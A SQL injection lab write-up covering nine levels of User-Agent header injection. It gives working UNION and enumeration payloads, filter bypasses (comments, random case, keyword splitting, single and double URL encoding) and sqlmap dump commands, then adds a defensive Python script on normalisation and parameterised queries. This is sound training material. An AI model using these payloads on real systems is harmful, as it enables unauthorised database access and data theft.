SQL Injection
Level 1
The application reads the User-Agent header value and then displays it. Changing the value to a single quote produces a database error which reveals that MySQL is in use.


' UNION SELECT user(); -- -
Otherwise, save the request from Burp and use SQLMap:
sqlmap -r level1 --banner -D 1sqlilabs -T browsers --dump

Level 2
In this level UNION and standard payloads are filtered.

sqlmap -u 'http://2.sqli.labs/' -p user-agent --user-agent=elsagent --technique=B --banner


Level 3
In this level spaces are not allowed.
/'/**/UNION/**/SELECT/**/@@version;#
sqlmap -u 'http://3.sqli.labs/' -p user-agent --user-agent=blah --banner --tamper=space2comment



Level 4
Comments are blocked in this level.
'UNION(select('PoC String'));#

# Enumerating the tables
'union(SELECT(group_concat(table_name))FROM(information_schema.columns)where(table_schema=database()));#
# Enumerating the columns
'union(SELECT(group_concat(column_name))FROM(information_schema.columns)where(table_name='secretcustomers'));#


Level 5
Same as above, but had to use double quotes.


Level 6
A random case for every letter was needed to bypass the filter. SQLMap's randomcase tamper script can be used for this level.

Level 7
The filter for reserved words is non-recursive: each blocked word is removed in a single pass, so a keyword whose letters are separated by another blocked word (ZEROFILL below) is reassembled once the filter has run.
' uZEROFILLnZEROFILLiZEROFILLoZEROFILLnZEROFILL ZEROFILLsZEROFILLeZEROFILLlZEROFILLeZEROFILLcZEROFILLt ZEROFILL@@ZEROFILLvZEROFILLeZEROFILLrZEROFILLsZEROFILLiZEROFILLoZEROFILLnZEROFILL; ZEROFILL-- ZEROFILL-ZEROFILL

Level 8
The filter can be bypassed with URL encoding.
%61%61%61%61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%3b%20%2d%2d%20%2d


Level 9
The filter can be bypassed with double URL encoding.
%25%36%31%25%36%31%25%36%31%25%36%31%25%32%37%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%34%30%25%34%30%25%37%36%25%36%35%25%37%32%25%37%33%25%36%39%25%36%66%25%36%65%25%33%62%25%32%30%25%32%64%25%32%64%25%32%30%25%32%64

sqlmap -u 'http://9.sqli.labs/' -p user-agent --tamper=chardoubleencode --banner --level=3
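Taken together, levels 3 and 6 to 9 show that a blocklist on the raw User-Agent value is defeated by inline comments, case changes, single-pass keyword stripping and (double) URL encoding. The following Python script is an added example, not part of the original write-up or the lab, written from the defender's side: it normalises a header value (decode to a fixed point, drop /**/ comments, collapse whitespace, lower-case) before a signature check, reproduces the level 7 single-pass filter next to a fixed-point variant, and shows that a parameterised query binds the level 1 payload as plain data. The sample inputs are the payloads quoted above plus a constructed benign User-Agent; the in-memory SQLite `browsers` table stands in for the lab's MySQL table and is an assumption. Note that the level 7 payload still slips past the signature check, which is the point: normalisation makes detection better, only parameterisation makes the query safe.

```python
import re
import sqlite3
from urllib.parse import unquote

# Keywords a detection rule looks for once the value has been normalised.
KEYWORDS = ("union", "select", "information_schema", "@@version", "user()")
# Words the level 7 style filter removes (assumption: the lab's real list is not known).
BLOCKED = ("union", "select", "zerofill")

# Constructed sample inputs: the lab payloads quoted above plus a benign User-Agent.
LEVEL3 = "/'/**/UNION/**/SELECT/**/@@version;#"
LEVEL7 = ("' uZEROFILLnZEROFILLiZEROFILLoZEROFILLnZEROFILL "
          "ZEROFILLsZEROFILLeZEROFILLlZEROFILLeZEROFILLcZEROFILLt "
          "ZEROFILL@@ZEROFILLvZEROFILLeZEROFILLrZEROFILLsZEROFILLiZEROFILLoZEROFILLnZEROFILL; "
          "ZEROFILL-- ZEROFILL-ZEROFILL")
LEVEL9 = ("%25%36%31%25%36%31%25%36%31%25%36%31%25%32%37%25%32%30%25%37%35%25%36%65"
          "%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35"
          "%25%36%33%25%37%34%25%32%30%25%34%30%25%34%30%25%37%36%25%36%35%25%37%32"
          "%25%37%33%25%36%39%25%36%66%25%36%65%25%33%62%25%32%30%25%32%64%25%32%64"
          "%25%32%30%25%32%64")
BENIGN = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"


def url_decode_fully(value: str, max_rounds: int = 5) -> str:
    """Decode until the value stops changing, so double encoding (level 9) is undone."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def strip_inline_comments(value: str) -> str:
    """Replace /**/ comments with a space so UNION/**/SELECT (level 3) reads as two words."""
    return re.sub(r"/\*.*?\*/", " ", value, flags=re.S)


def normalise(value: str) -> str:
    """Canonical form for matching: decoded, comment-free, single-spaced, lower-cased."""
    value = strip_inline_comments(url_decode_fully(value))
    return re.sub(r"\s+", " ", value).lower()


def looks_injected(value: str) -> bool:
    """Signature check on the normalised value; lower-casing covers the level 6 randomcase trick."""
    return any(kw in normalise(value) for kw in KEYWORDS)


def strip_once(value: str, blocked) -> str:
    """Single-pass keyword removal, i.e. the non-recursive filter of level 7."""
    for kw in blocked:
        value = re.sub(re.escape(kw), "", value, flags=re.I)
    return value


def strip_to_fixed_point(value: str, blocked, max_rounds: int = 10) -> str:
    """Re-run the strip until nothing changes, so keywords reassembled by one pass are removed too."""
    for _ in range(max_rounds):
        stripped = strip_once(value, blocked)
        if stripped == value:
            break
        value = stripped
    return value


def lookup_browser(user_agent: str):
    """Parameterised query: the header value is bound as data, never spliced into the SQL text.
    An in-memory SQLite table stands in for the lab's MySQL 'browsers' table (assumption)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE browsers (agent TEXT)")
    con.execute("INSERT INTO browsers VALUES (?)", (BENIGN,))
    return con.execute("SELECT agent FROM browsers WHERE agent = ?", (user_agent,)).fetchall()


if __name__ == "__main__":
    for ua in (BENIGN, LEVEL3, LEVEL7, LEVEL9):
        print(f"flagged={looks_injected(ua)!s:5}  normalised={normalise(ua)[:45]!r}")
    print("level 7 after one strip pass   :", strip_once(LEVEL7, BLOCKED))
    print("level 7 after fixed-point strip:", strip_to_fixed_point(LEVEL7, BLOCKED))
    print("parameterised lookup of level 1 payload:", lookup_browser("' UNION SELECT user(); -- -"))
```

Running the script flags the level 3 and level 9 values, leaves the benign User-Agent alone, and prints the level 7 value with `union select` visible after a single strip pass but gone after the fixed-point strip; the parameterised lookup returns no rows for the level 1 payload because the whole string is compared literally against the `agent` column.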
